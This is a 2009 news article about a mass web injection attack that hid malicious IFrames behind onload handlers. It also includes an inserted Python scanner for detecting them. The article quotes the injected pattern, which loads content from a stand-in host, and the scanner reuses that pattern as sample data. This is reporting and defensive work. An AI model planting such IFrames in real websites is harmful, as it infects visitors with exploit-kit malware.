New Mass Web Injection Attack Spreading

Malicious IFrame uses onload event to generate src

By Lucian Constantin, Web News Editor

26th of October 2009, 14:40 GMT

[Image: IFrame injection attack uses onload JavaScript event to hide src]
Security researchers warn that a new injection attack has infected thousands of websites with malicious IFrames. In order to avoid detection, the rogue IFrames get their src attribute through an onload JavaScript event.

The infection was first spotted by malware analysts from antivirus vendor Sophos on the website of music legend Van Morrison. "What I did see was a heavily obfuscated script injected into the page that references an iframe. A quick analysis of the obfuscated script revealed that it adds an iframe to the page to load content from a remote site," Paul O Baccas, virus and spam researcher at SophosLabs reported on October 22nd.

Since then, Sophos has added detection for this threat under the name Mal/Iframe-N. Mr. Baccas announced yesterday that the number of infections with this malicious piece of code had risen to several thousands of websites, including some high-profile ones.

Aside from the heavy obfuscation, which is a common technique for hiding rogue code on compromised pages, this attack uses a specific trick to avoid Web scanners. Decoding the string results in an IFrame that doesn't have a direct src value. Instead, it uses an onload="if (!this.src) {this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}" event handler to generate it, so a scanner that only inspects the src attribute of IFrames finds nothing to check.

The src usually points to an exploit kit hosted on third-party servers, which targets vulnerabilities in outdated software and attempts to infect visitors with malware. "All the domains used so far have been based in Russia," the Sophos researcher notes.

The method of injection has not been determined yet, but regardless of how it's done, the malicious IFrame is inserted at the end of the page, after the closing </html> tag. In a recent similar attack, compromised FTP credentials were used to infect the websites, but automated tools exploiting cross-site scripting or SQL injection weaknesses are likely candidates too.
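
A defensive check for the two traits described above, added here as an example and not code from Sophos or from the article: it flags an IFrame that has no src but whose event handler assigns this.src, and any element that appears after the closing </html> tag. The scan() function, the finding labels and the sample page are assumptions constructed for illustration; the check inspects already-decoded markup and does not deobfuscate scripts.

```python
import re
from html.parser import HTMLParser

# An event handler that assigns the frame's own src at runtime (not a comparison).
SRC_ASSIGN = re.compile(r"\bthis\s*\.\s*src\s*=[^=]")

class IframeScanner(HTMLParser):
    """Records the two traits described in the article (labels are illustrative)."""

    def __init__(self):
        super().__init__()
        self.after_html_close = False
        self.findings = []  # (line, label, tag)

    def handle_starttag(self, tag, attrs):
        line = self.getpos()[0]
        if self.after_html_close:
            # Any element after </html> sits outside the document proper.
            self.findings.append((line, "markup-after-html-close", tag))
        if tag != "iframe":
            return
        attr = {name: (value or "") for name, value in attrs}
        handlers = [v for name, v in attr.items() if name.startswith("on")]
        if not attr.get("src", "").strip() and any(SRC_ASSIGN.search(h) for h in handlers):
            self.findings.append((line, "src-set-by-event-handler", tag))

    def handle_endtag(self, tag):
        if tag == "html":
            self.after_html_close = True

def scan(markup):
    """Return findings for decoded markup; does not deobfuscate scripts."""
    scanner = IframeScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings

# Constructed sample page; the onload value is the pattern quoted in the article.
SAMPLE = """<html><body>
<iframe src="/widgets/player.html" width="300" height="200"></iframe>
</body></html>
<iframe onload="if (!this.src) {this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"></iframe>
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Run against a site's served pages or files on disk, a finding of either kind is a reason to compare the file with a known-good copy.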

Web exploitation has been a common method of malware distribution, suggesting that the technique is successful enough for cybercriminals to invest their resources into these attacks. Studies have shown that this is largely because users fail to install critical patches for popular software such as Adobe Reader, Flash Player, Java Runtime Environment, Microsoft Office or Windows itself.

© Copyright 2001-2010 Softpedia